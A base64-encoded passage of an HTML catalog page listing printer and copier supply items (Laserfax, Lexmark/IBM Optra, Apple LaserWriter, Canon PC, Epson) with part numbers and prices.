dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxlc2VyZmF4IDUwMCwgNzAw PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+RlgxPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ JDU5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkl0ZW0gIyAxNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDUwMDAsIDcwMDA8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMT5GWDI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNjQ8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjIDE2PC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+TGFzZXJmYXggNjAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkZYMzwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMxNzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyZmF4IDg1MDAsIDkw MDA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5GWDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4kNTQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMTg8L2Zv bnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmZheCAzMjAwPC9mb250PjwvZm9udD48L2NlbnRl cj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+MzkwNkE8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNDQ8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+ PHU+PGZvbnQgZmFjZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMj5Gb3INCkxleG1hcmsgLyBJQk0gTWFjaGluZXM6PGk+IChvbiBQYWdlIDMpPC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFibGUgQk9S REVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTklIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8dHIgQkdD T0xPUj0iIzQwODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Yj48 Zm9udCBmYWNlPSJCb29rbWFuIE9sZCBTdHlsZSI+Jm5ic3A7PC9mb250PjwvYj48Zm9udCANCnNp emU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsxPkRFU0NSSVBUSU9OPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZG RkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+SUJNIDQwMTkvNDAyOSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPjEzODAyMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kOTU8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMjwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPk9wdHJhIFIsNDAzOSwgNDA0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPjEzODIx NTA8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTE3PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPkl0ZW0gIzM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0K PHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5PcHRyYSBF MzEwLCBFMzEyPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+ PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7MTJBMjIwMjwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEgRTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPiZuYnNwOzY5RzgyNTYmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4kNTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjNTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk9wdHJhIFM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT4mbmJzcDsxMzgyNjI1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEzNTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM2PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+T3B0cmEgVDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyAxMkE1 ODQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDE2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM3PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+T3B0cmEg RTQxMC80MTI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDsgNEswMDE5OCZuYnNwOzwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQo8L3RhYmxlPjwvY2VudGVyPg0KDQo8Y2VudGVyPg0KPHA+PHU+PGZvbnQgZmFj ZT0iQXJpYWwsSGVsdmV0aWNhIj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMj5G b3INCkFwcGxlIFByaW50ZXJzOjxpPiAob24gUGFnZSA4KTwvaT48L2ZvbnQ+PC9mb250PjwvZm9u dD48L3U+PC9jZW50ZXI+DQoNCjxjZW50ZXI+PHRhYmxlIEJPUkRFUiBXSURUSD0iODAlIiBIRUlH SFQ9IjEwJSIgQkdDT0xPUj0iI0ZGRkZDQyIgPg0KPHRyIEFMSUdOPUxFRlQgQkdDT0xPUj0iIzQw ODA4MCI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsx PklURU08L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5ERVNDUklQVElPTjwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48 Zm9udCBzaXplPSsxPk1GRyM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0K PGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9u dCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtJm5ic3A7ICMxPC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+UGVyc29uYWwgTGFzZXJXcml0ZXI8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5NMDA4OUxMQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMyPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+TGFzZXJXcml0ZXIgMzAwUFgvIDMyMC00TCwrNE1MPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+TTIwNDVHQTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1NDwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJXcml0ZXIgU2VsZWN0IDM2MDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk0xOTYwR0E8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kNzQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+SXRlbSAjNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyV3JpdGVy IDE2LyA2MDAgUHJvJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TTI0NzNHQTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICM1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJXcml0ZXIgMTIv IDY0MCBQUzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPk00NjgzR0EmbmJzcDs8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyIFdyaXRlciBOVC8yTlQ8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5NNDUzMkdBPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+JDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2Nl bnRlcj4NCg0KPGNlbnRlcj4NCjxwPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+Jm5ic3A7 PHU+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpDYW5ub24gQ29waWVy czogKFBhZ2UgMTApPC9mb250PjwvZm9udD48L3U+PC9mb250PjwvY2VudGVyPg0KDQo8cD48YnI+ DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIxMCUiIEJHQ09MT1I9 IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXpl PSsxPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDYvIDZSRS8gNy8gOC8g MTEvIDEyLyA2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0EzMCZuYnNwOzwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ2OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICMgMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDMwMC8zMjAvMzQw LzM2MCZuYnNwOyBBbGwNCjMwMCBTZXJpZXM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtFNDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9 IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PlBDIDcwMC83MjAvNzYwJm5ic3A7IEFsbCA3MDANClNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0U0MCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+UEMgOTAwLzkxMC85MjAmbmJzcDsgQWxsIDkwMA0KU2VyaWVzPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7RTQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4N Cg0KPGNlbnRlcj4NCjxwPjx1Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpFcHNvbiBhbmQgUGFuYXNvbmljIFByaW50 ZXJzOihvbiBQYWdlcyA0ICZhbXA7IDcpPC9mb250PjwvZm9udD48L2ZvbnQ+PC91PjwvY2VudGVy Pg0KDQo8cD48YnI+DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIx MCUiIEJHQ09MT1I9IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IHNpemU9KzE+Jm5ic3A7 PGZvbnQgY29sb3I9IiNGRkZGRkYiPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkVwc29uIDEwMDAvMTUwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlMwNTEwMTEmbmJzcDs8 